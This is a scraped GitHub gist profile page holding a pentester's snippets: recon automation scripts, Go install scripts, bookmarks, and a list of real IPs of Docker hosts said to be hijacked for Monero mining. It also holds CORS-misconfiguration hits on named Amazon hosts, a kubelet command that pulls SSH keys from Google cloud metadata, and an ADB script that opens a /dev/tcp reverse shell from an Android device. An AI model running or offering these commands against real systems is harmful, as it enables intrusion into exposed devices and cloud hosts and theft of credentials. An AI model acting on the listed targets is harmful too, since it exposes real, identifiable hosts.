Skip to content

Instantly share code, notes, and snippets.

💭
Hacking!

Robbie random-robbie

💭
Hacking!
Block or report user

Report or block random-robbie

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@random-robbie
random-robbie / aq.sh
Last active May 8, 2019
aq put it in /bin/ and chmod 777 it
View aq.sh
#!/bin/bash
aquatone-discover -d $1 --threads 10
aquatone-scan -d $1 --ports huge --threads 10
DEBUG=nightmare xvfb-run -a aquatone-gather -d $1 --threads 10
aquatone-takeover -d $1 --threads 10
@random-robbie
random-robbie / Docker-XMR.md
Last active Apr 27, 2019
Hijacked XMR Docker Servers
View Docker-XMR.md

Hijacked Systems

All the following IPs have the docker API exposed and have been hijacked to mine XMR

101.132.125.134
101.251.243.178
@random-robbie
random-robbie / go.sh
Last active Apr 24, 2019
install golang
View go.sh
echo 'Installing go...'
wget https://dl.google.com/go/go1.12.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.12.4.linux-amd64.tar.gz
rm go1.12.4.linux-amd64.tar.gz
export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
echo 'export GOROOT=/usr/local/go' >> ~/.bashrc
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOROOT/bin:$GOPATH/bin' >> ~/.bashrc
View cors.txt
Issue detected : CORS misconfiguration amazonlive-portal.amazon.com Payload Send Origin response contains Access-Control-Allow-Origin: null
Issue detected : CORS misconfiguration amazonlive-portal.amazon.com Payload Send Origin response contains Access-Control-Allow-Origin: https://doesnot.exists
Issue detected : CORS misconfiguration dexr.amazon.com Payload Send Origin response contains Access-Control-Allow-Origin: null
Issue detected : CORS misconfiguration dexr.amazon.com Payload Send Origin response contains Access-Control-Allow-Origin: https://doesnot.exists
Issue detected : CORS misconfiguration internal.campfire.amazon.com Payload Send Origin response contains Access-Control-Allow-Origin: null
Issue detected : CORS misconfiguration internal-gamma.campfire.amazon.com Payload Send Origin response contains Access-Control-Allow-Origin: null
Issue detected : CORS misconfiguration internal.campfire.amazon.com Payload Send Origin response contains Access-Control-Allow-Origin: https://doesnot.exists
Issue dete
@random-robbie
random-robbie / bookmarks.html
Last active Apr 1, 2019
Private Bookmarks
View bookmarks.html
https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c
https://www.cidrcalculator.com/asn/asn-to-prefix.html?lang=en
https://itnext.io/aks-kubernetes-security-walk-through-challenge-2-dbe3ed16beec
https://www.digitalinterruption.com/single-post/2018/06/04/Are-Your-Cookies-Telling-Your-Fortune
https://blog.innerht.ml/
View google-kube.md

Retrive Public SSH keys from google metadata

Request

curl -sk https://IP:10250/run/NAMESPACE/POD/CONTAINERNAME -d "busybox wget -q -O - --header='Metadata-Flavor: Google' http://metadata/computeMetadata/v1/project/attributes/ssh-keys?alt=json"
View params.txt
0
1
11
12
13
14
15
16
17
2
View gopi.sh
echo 'Installing go...'
wget https://dl.google.com/go/go1.11.5.linux-armv6l.tar.gz
sudo tar -C /usr/local -xzf go1.11.5.linux-armv6l.tar.gz
rm go1.11.5.linux-armv6l.tar.gz
export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
echo 'export GOROOT=/usr/local/go' >> ~/.bashrc
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOROOT/bin:$GOPATH/bin' >> ~/.bashrc
View start.sh
cat urls.txt | while read url; do gobuster -u https://"$url" -q -e -k -w content_discovery_all.txt; done > sub_url.txt; cat sub_url.txt| cut -d ' ' -f 1 > /opt/parameth/params.txt;cd /opt/parameth;cat params.txt | while read url; do python /opt/parameth/parameth.py -u http://"$url"; done
@random-robbie
random-robbie / android-shell.sh
Last active Mar 14, 2019
Android Reverse Shell
View android-shell.sh
#!/bin/bash
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"
You can’t perform that action at this time.